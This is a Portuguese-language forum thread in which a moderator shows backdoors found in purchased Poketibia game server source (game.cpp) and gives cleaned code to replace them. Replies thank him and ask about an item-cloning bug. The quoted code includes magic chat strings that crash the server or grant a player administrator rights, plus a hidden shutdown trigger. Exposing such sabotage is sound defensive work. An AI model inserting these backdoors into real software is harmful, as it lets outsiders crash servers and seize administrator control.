Ir para conteúdo
  • Cadastre-se

Programação Source Poketibia - Códigos de derrubar


Posts Recomendados

  • Respostas 41
  • Created
  • Última resposta

Top Posters In This Topic

Top Posters In This Topic

Popular Posts

Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o

Pelo estilo de código merda, eu até consigo imaginar quem que fez isso, kkkkkkkkkk.

opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!    

Muito bom Alexy, é bem triste ver que existem pessoas de má fé que colocam estes erros de proposito no servidor. 

Link para o post
Compartilhar em outros sites
  • Moderador
Agora, Matk disse:

Muito bom Alexy, é bem triste ver que existem pessoas de má fé que colocam estes erros de proposito no servidor. 

sim, pior quando você compra algo, é pq tem confiança, o mesmo começa a ficar com inveja e faz isso pra ferrar mesmo, muita mancada :(

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

Link para o post
Compartilhar em outros sites

Pelo estilo de código merda, eu até consigo imaginar quem que fez isso, kkkkkkkkkk.

discord.pngDiscord: vankk #7765

Precisando de ajuda? Entre em contato comigo via Discord.

 

Muitos vêm seus muitos dias de glória, mas poucos vêm seus muitos dias de luta.

Link para o post
Compartilhar em outros sites

Publique o nome do desgraçado em breve vou liberar á base aqui para ele parar de enganar as pessoas.

Cada escolha, uma oportunidade.
Cada queda, um aprendizado.
Cada atitude, uma consequência

 

.tumblr_nw2mfl0ut01r3aoszo1_400.gif

Link para o post
Compartilhar em outros sites

KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
O nego nem criatividade tem.

...foda...

 

Nem todo loop infinito é ruim ;P 

User *eu = new User("otteN");
RepSystem<User> *myRep = new RepSystem<User>("jóinha");
myRep->setAlvo(eu);

/* só por ser criado já sou o melhor membro */ 

while(eu->isMelhorMembro()){
myRep->reputar();
}

 

Link para o post
Compartilhar em outros sites
  • Moderador
Em 15/12/2016 ás 19:19, caiosantoro disse:

Publique o nome do desgraçado em breve vou liberar á base aqui para ele parar de enganar as pessoas.

chama Lucas Silva, outra coisa, ontem achei +1 código numa source do DXP que faz derruba, incrível, é só trocar pelo o meu ai.

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

Link para o post
Compartilhar em outros sites
  • Moderador
10 horas atrás, Valakinhas disse:

nao se compra algo que você consegue em um forum de "gratis"

sim!

Editado por Alexy Brocanello (veja o histórico de edições)

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

Link para o post
Compartilhar em outros sites
  • 2 weeks later...

O pior de tudo, é que muitos que fazem isso é de propósito, agir assim de má fé é melhor nem postar. Até porque não vejo a necessidade de uma pessoa que mexe com programação fazer isso. Coisa de criança mesmo.
 

D5RHqxi.png

 

Venha curti o Pokémon Underwater!

FB/PokemonUnderwater

 

Link para o post
Compartilhar em outros sites

Horrível isso. Muitos agem de má fé para causar o mau e o desanimo em pessoas que lutam para deixar seu servidor bom seja por hobby ou só por gostar de fazer tal coisa.

 

Você fez o correto em postar este erro e creio que ajudará muitos no fórum. Merece fix topic!

Link para o post
Compartilhar em outros sites

Muito Bom cara, Poste mais códigos que ajudará á muitos principalmente códigos da DXP.

Cada escolha, uma oportunidade.
Cada queda, um aprendizado.
Cada atitude, uma consequência

 

.tumblr_nw2mfl0ut01r3aoszo1_400.gif

Link para o post
Compartilhar em outros sites
  • Moderador
3 horas atrás, RathBR disse:

Muito Bom cara, Poste mais códigos que ajudará á muitos principalmente códigos da DXP.

pode deixar, vou trazer sim!

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

Link para o post
Compartilhar em outros sites
4 minutos atrás, Alexy Brocanello disse:

pode deixar, vou trazer sim!

Se você conseguisse trazer á solução do OPCODE DA DXP, pq tem algo no OPCODE Que Permite clonar itens.

Cada escolha, uma oportunidade.
Cada queda, um aprendizado.
Cada atitude, uma consequência

 

.tumblr_nw2mfl0ut01r3aoszo1_400.gif

Link para o post
Compartilhar em outros sites
Em 15/12/2016 ás 11:23, Alexy Brocanello disse:

Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava um cargo de administrador a um jogador com groups 1. Então me falaram que esse código era no game.cpp, portanto olhei linha por linha nessa source que está espalhada em vários fóruns e não é só aqui, é praticamente um código colocado por mal gosto, para ferrar praticamente com a vida de novos administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará da SOURCES do seu Poketibia para fazer essa verificação, caso possua o código da "morte" peço que siga o tutorial abaixo.

 

ACHE em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso)

 

Código 1


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}
	
	if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
    {
	exit(0);
    }
	
	if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
    { 
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Etapa do Código 1 Mude para:

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Pronto agora é só compilar sua source! Fiz update e achei outro código de derrubar no DXP.

 

Código 2

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);
		
		int specs = 31101996;
		std::string findText;
		std::stringstream findTextInput;
		findTextInput << specs;
		findText = findTextInput.str();
		bool exists = text.find(findText) != std::string::npos;
		if(exists){
           Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
		   return true; 
        }

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Código 2, mude para 

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

 

 

 

Logo mais revelo novo código da mortes, créditos a mim, e cipsoft pelo código original.

 

cara eu comecei a mexer com poketibia esse ano certamente que sou um otadmin ainda pois nao sei muita coisa mais todos os dias procuro estudar sistemas scripts e ja aprendi bastante coisa ao longo do tempo :) uma coisa que to me aventurando agora e tentar aprender compilar uma sourcer sera que voce pode me dizer como faço tal façanha ? ou poderia me passar um link que ensine obrigado Rep+

Link para o post
Compartilhar em outros sites
  • Moderador
1 minuto atrás, Punchlines Nemmo disse:

cara eu comecei a mexer com poketibia esse ano certamente que sou um otadmin ainda pois nao sei muita coisa mais todos os dias procuro estudar sistemas scripts e ja aprendi bastante coisa ao longo do tempo :) uma coisa que to me aventurando agora e tentar aprender compilar uma sourcer sera que voce pode me dizer como faço tal façanha ? ou poderia me passar um link que ensine obrigado Rep+

opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!

 

 

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

Link para o post
Compartilhar em outros sites
Agora, Alexy Brocanello disse:

opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!

 

 

vlw me ajudou bastante :) e sobre a sourcer da dxp eu vi que tem um erro bastante chato e tals que permite que o player clonar itens sera que voce poderia dar uma olhada nele ? e que meu projeto ta na dxp :D mais msm assim vlw msm pela força

Link para o post
Compartilhar em outros sites
  • 2 months later...
Em 15/12/2016 ás 10:23, Alexy Brocanello disse:

Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava um cargo de administrador a um jogador com groups 1. Então me falaram que esse código era no game.cpp, portanto olhei linha por linha nessa source que está espalhada em vários fóruns e não é só aqui, é praticamente um código colocado por mal gosto, para ferrar praticamente com a vida de novos administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará da SOURCES do seu Poketibia para fazer essa verificação, caso possua o código da "morte" peço que siga o tutorial abaixo.

 

ACHE em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso)

 

Código 1


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}
	
	if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
    {
	exit(0);
    }
	
	if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
    { 
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Etapa do Código 1 Mude para:

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Pronto agora é só compilar sua source! Fiz update e achei outro código de derrubar no DXP.

 

Código 2

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);
		
		int specs = 31101996;
		std::string findText;
		std::stringstream findTextInput;
		findTextInput << specs;
		findText = findTextInput.str();
		bool exists = text.find(findText) != std::string::npos;
		if(exists){
           Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
		   return true; 
        }

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Código 2, mude para 

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

 

 

 

Logo mais revelo novo código da mortes, créditos a mim, e cipsoft pelo código original.

 

Esqueceu de citar o payordown Tbm ^^ 

 

Link para o post
Compartilhar em outros sites

Participe da conversa

Você pode postar agora e se cadastrar mais tarde. Se você tem uma conta, faça o login para postar com sua conta.

Visitante
Responder

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emojis são permitidos.

×   Seu link foi automaticamente incorporado.   Mostrar como link

×   Seu conteúdo anterior foi restaurado.   Limpar o editor

×   Não é possível colar imagens diretamente. Carregar ou inserir imagens do URL.

  • Quem Está Navegando   0 membros estão online

    Nenhum usuário registrado visualizando esta página.


  • Conteúdo Similar

    • Por Muvuka
      Alguem tem anti-nuker igual a esse 
       

       
    • Por Muvuka
      [SQLite] -=[TFS]=- 0.4 8.60 Alguem faz apk mobile pra mim ip: dexsoft.ddns.net
       
      pra mim
       
      https://www.mediafire.com/file/5klqnyy6k7jda0u/OTClientV8.rar/file
       
      TA TUDO AI
    • Por yuriowns
      Salve rapazes, estou precisando de um client próprio para o meu servidor 7.4, preciso que algum programador experiente e com referências faça um client do jeito que eu procuro. Responda aqui para fazermos um orçamento, obrigado!

      Não sei se estou no lugar certo, se não me desculpem e peço que movam por gentileza!
    • Por paulo thush
      Pessoal to com um grande problema, estou com um servidor TFS 1.4x 10.98, recentemente começou dar um problema, sempre quando falava "trade" com o npc dava um erros, com qual quer npc, o erro e o seguinte.
       
       
      me falaram que o problema e nas sourcer que precisava mudar umas coisas me passaram um link no github esse aqui 
      https://github.com/otland/forgottenserver/pull/3996/files
       
      porem eu vi vídeos no youtube ensinando a compilar, já vi muitos tópicos como compilar a sourcer, ai quando vou compilar da esse erro
      já tentei instalar, desinstala muitas coisas, alterar também não vai, minha sourcer e essa 
      https://github.com/otland/forgottenserver
       
       
      Alguém poderia me ajuda com esse erro, ou ate compilar 100% as sourcer. os Tópicos que eu tentei para compilar e esse daqui, se não poder o link me desculpe.
      https://forums.otserv.com.br/index.php?/forums/topic/169234-windowsvc2019-compilando-sources-tfs-14-vcpkg/
       
      alguém me da uma luz por favor kkk
    • Por Ryzek
      Uso tfs 0.4 trunk3884 bem simples.
      Queria acrescentar magic effects para 255 pois o meu só vai até 69. Encontrei um tópico que falava sobre porém parece ter sido removido, não consigo acessar!

×
×
  • Criar Novo...

Informação Importante

Confirmação de Termo